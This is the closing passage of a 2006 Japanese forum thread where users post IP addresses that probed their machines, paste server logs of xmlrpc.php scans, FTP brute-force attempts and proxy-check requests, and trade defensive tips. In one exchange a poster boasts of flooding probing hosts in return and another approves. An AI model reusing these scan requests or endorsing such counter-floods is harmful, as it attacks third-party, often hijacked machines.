p. [ネームサーバ] ns03.mesh.ad.jp
[状態] Connected (2006/12/31)
[登録年月日] 1994/12/12
[接続年月日] 1995/01/30
[最終更新] 2006/01/01 01:16:12 (JST)

一回リモホ強制表示の板でこいつを注意したら
毎日のように来るorz
957名無しさん@お腹いっぱい。:2006/05/07(日) 18:42:59
>>1
不正アクセスの意味わかってる?
958名無しさん@お腹いっぱい。:2006/05/07(日) 18:44:24
>>955
残念ながらそのIP情報からは何もわかりません。
959名無しさん@お腹いっぱい。:2006/05/07(日) 19:00:36
Whoisの[最終更新]ってIPが変わった日のことですか?
960名無しさん@お腹いっぱい。:2006/05/07(日) 19:10:16
whoisじゃないですか。まぁとにかく
956>に[最終更新]ってるじゃないですか、何が更新されているのですか?
Ipが変化したのですか?
961名無しさん@お腹いっぱい。:2006/05/07(日) 19:51:51
>>960
最終更新]ってるじゃないですか最終更新]ってるじゃないですか最終更新]ってるじゃないですか
962名無しさん@お腹いっぱい。:2006/05/08(月) 08:10:09
203.131.198.199からPCの電源入れるたびにアクセスがあります。
なんでだろ?
963名無しさん@お腹いっぱい。:2006/05/08(月) 08:53:28
blog.t.livedoor.jpに聞けよ、つか、おまいのブログとかだったりしない?w
964名無しさん@お腹いっぱい。:2006/05/08(月) 09:04:43
>>963
ブログなんて滅相もない。
livedoorに聞いたほうがよさげだね。サンクス
965名無しさん@お腹いっぱい。:2006/05/08(月) 17:45:20
IPアドレス 220.104.3.196
ホスト名 p3196-ipbf05souka.saitama.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 光

IPアドレス 220.104.57.151
ホスト名 p3151-ipad03hiraide.tochigi.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 栃木県
市外局番 --
接続回線 xDSL

で、どうした?
966名無しさん@お腹いっぱい。:2006/05/08(月) 19:29:07
さいたまー
967名無しさん@お腹いっぱい。:2006/05/09(火) 16:35:41
IPアドレス 220.96.156.40
ホスト名 p2040-ipbf01funabasi.chiba.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 光

光体操の効果がデてきましたよ。
968962:2006/05/09(火) 20:16:39
livedoorblogに問い合わせたらパッタリとアクセスが無くなった。
電源入れるだけで1日に20〜30回はセキュリティ警告があったのに。
しかも問い合わせの返信メールが来ない…
何か変。
でも、無事解決。
969名無しさん@お腹いっぱい。:2006/05/09(火) 21:13:01
218.229.60.136
970名無しさん@お腹いっぱい。:2006/05/09(火) 21:20:34
>>971
よかったな、でもなんか気持ち悪いな
とりあえずなんかのサイト見てライブドア系だったらこまめにキャッシュ消して
クッキーは残さない、いや受け入れないことだな
971名無しさん@お腹いっぱい。:2006/05/09(火) 22:04:01
>>970
サンクス。
クッキーやキャッシュの件、了解しました。
972名無しさん@お腹いっぱい。:2006/05/09(火) 22:11:45
137.189.97.18
973名無しさん@お腹いっぱい。:2006/05/11(木) 04:19:01
某国からポート8080にアクセスされてる
リクエストは"GET http://www.google.com/intl/zh-CN/ HTTP/1.0" 応答404

8080を選んで開けたのは意図的だけど、実験鯖でproxy機能なんか無いっつの

実害無くても腹立つから、いっそのこと404の替わりに、
天安門や法輪功みたいな検閲対象語句を含めた某国政府批判ページで応答してやろうか…?
974名無しさん@お腹いっぱい。:2006/05/11(木) 10:07:27
それいいな。ぜひ作ったら公開してくれ。
975名無しさん@お腹いっぱい。:2006/05/11(木) 12:09:30
d3015d9a.tcat.ne.jp
211.1.93.154:33134

昨日からのアクセスが100回以上
いい加減にしろ
976名無しさん@お腹いっぱい。:2006/05/12(金) 05:01:22
239.255.255.250
うざすぎ
977名無しさん@お腹いっぱい。:2006/05/12(金) 05:12:40
>>976
ルータのUPnPを止めればいいだろ薄ら馬鹿
978名無しさん@お腹いっぱい。:2006/05/12(金) 08:27:01
>>977
ほんとだ、気付かずに
1時間ぐらい火壁と格闘してたよ、アホだな俺。
ありがとw
979名無しさん@お腹いっぱい。:2006/05/12(金) 14:59:59
206.223.150.96
980名無しさん@お腹いっぱい。:2006/05/13(土) 05:24:48
206.223.149.90
banana340.maido3.com

米国から
981名無しさん@お腹いっぱい。:2006/05/13(土) 05:37:02
>>983
そんな餌にク(r
982名無しさん@お腹いっぱい。:2006/05/13(土) 09:20:33
>>980
2chの鯖
983名無しさん@お腹いっぱい。:2006/05/13(土) 19:42:29
43.244.161.218
の紹介のSPAMが日に50通くらい来てウザイ。
アドレス同じなのに毎回URL違う。
GMO Internet(interQの運営元)のサービスを使ってる。
984名無しさん@お腹いっぱい。:2006/05/14(日) 11:38:38
218.216.234.205
985 株価【60】 :2006/05/15(月) 00:41:22
986名無しさん@お腹いっぱい。:2006/05/15(月) 06:33:02
c-65-96-239-168.hsd1.ma.comcast.net UNKNOWN nobody [10/May/2006:11:37:50 +0900] "USER Administrator" 331 -
c-65-96-239-168.hsd1.ma.comcast.net UNKNOWN nobody [10/May/2006:11:37:50 +0900] "PASS (hidden)" 530 -

15分間で約1800回FTPログイン試行してきた。
だから、AdministratorなんてIDねぇって。
987名無しさん@お腹いっぱい。:2006/05/15(月) 07:39:48
>986
そういうのって大抵は踏み台だろ。sshも多いよ。
たまにアクセスしてきたプロトコルでflooding攻撃してあげてるけど持ち主は気づいてくれるかな?
IDで文章を書いてる。
988名無しさん@お腹いっぱい。:2006/05/15(月) 20:21:27
>>987
な〜る。
IDで文書。。いいねそれw

こんどお返ししてあげよう。
989973:2006/05/16(火) 14:38:22
>>987-988
持ち主は気付かないと思うよw
ってか、気付くようなら最初から踏み台にされたりしないんじゃね?
お前さん方が攻撃者にならなくてもいいでしょ


開けっ放しのポート8080には、米国からIPやリクエスト内容を変えながら数回のアクセス。
顔文字が入ってるリクエスト"GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1"は何かのメッセージか?w

発信元IPは以下。これらも踏み台なのかもしれないけど…
69.15.194.46
61.150.109.73
61.129.117.101
990名無しさん@お腹いっぱい。:2006/05/16(火) 20:10:33
今日
216.129.98.137 - - [16/May/2006:06:11:18 +0900] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:18 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:19 +0900] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:20 +0900] "GET /ads/adxmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:21 +0900] "GET /xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:21 +0900] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /blog/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:22 +0900] "GET /drupal/xmlrpc.php HTTP/1.0" 404 255 "-" "-"
216.129.98.137 - - [16/May/2006:06:11:23 +0900] "GET /community/xmlrpc.php HTTP/1.0" 404 255 "-" "-"

あと、同じIPで二日おきに
61.129.113.230 - - [16/May/2006:19:24:32 +0900] "GET http://lookfreebies.com/prx1.php HTTP/1.0" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

なんですかこれ?
991 :2006/05/17(水) 00:26:40
 
992名無しさん@お腹いっぱい。:2006/05/17(水) 05:37:55
>>991が見えない
993名無しさん@お腹いっぱい。:2006/05/17(水) 11:37:15
>>990
後半の"GET http://〜"は、誰かのIEのproxy設定に入れられてるのでしょう
404を返してるから、実際に踏み台になったのかどうかは分からないです

IEのproxy設定に自鯖のIPとポートを入れて、どこか外部のページを見に行ってみて、
自鯖がproxyとして動かないことを確認しておくのがよいかと
994名無しさん@お腹いっぱい。:2006/05/17(水) 12:12:20
用もないのにGET http://〜はプロクシチェッカだな。
>>990の場合prx1.phpが存在すると200が返るからわかり辛い。
>>993の通りプロクシになってないか確認しておくのが良いかと。
995名無しさん@お腹いっぱい。:2006/05/17(水) 23:25:26
TCP SYN FLOOD ベスト3
40回:207.68.178.16
32回:65.54.195.185
24回:207.68.178.239
996990:2006/05/18(木) 02:14:07
>>993
>>994

サンクス

squidは動かしてないけど、念のため串テストやってみた。
とりあえずプロキシとしては動いてないっぽいです。
Apacheが串に化けてたら手に負えないw

無駄に8080空けてトップにゴミページ載せようかな・・・
997名無しさん@お腹いっぱい。:2006/05/18(木) 04:01:02
>>996
Apacheはバーチャルホスト設定にして、その一番最初をダミーホストにするだよ。
そうすればIPアドレスでアクセスしてくるそやつらは全部そこ行き。
二番目以降で中身のあるホストを設定するだす。
「バーチャルホスト ダミー」で検索してみりん。
998名無しさん@お腹いっぱい。:2006/05/18(木) 09:33:17
192.168.0.19
999名無しさん@お腹いっぱい。:2006/05/18(木) 09:34:02
>>9
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \ /  \ /  \ /  \ /  \
1000名無しさん@お腹いっぱい。:2006/05/18(木) 09:35:52
支那蓄がウザイとです。
もうね氏ねと――
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。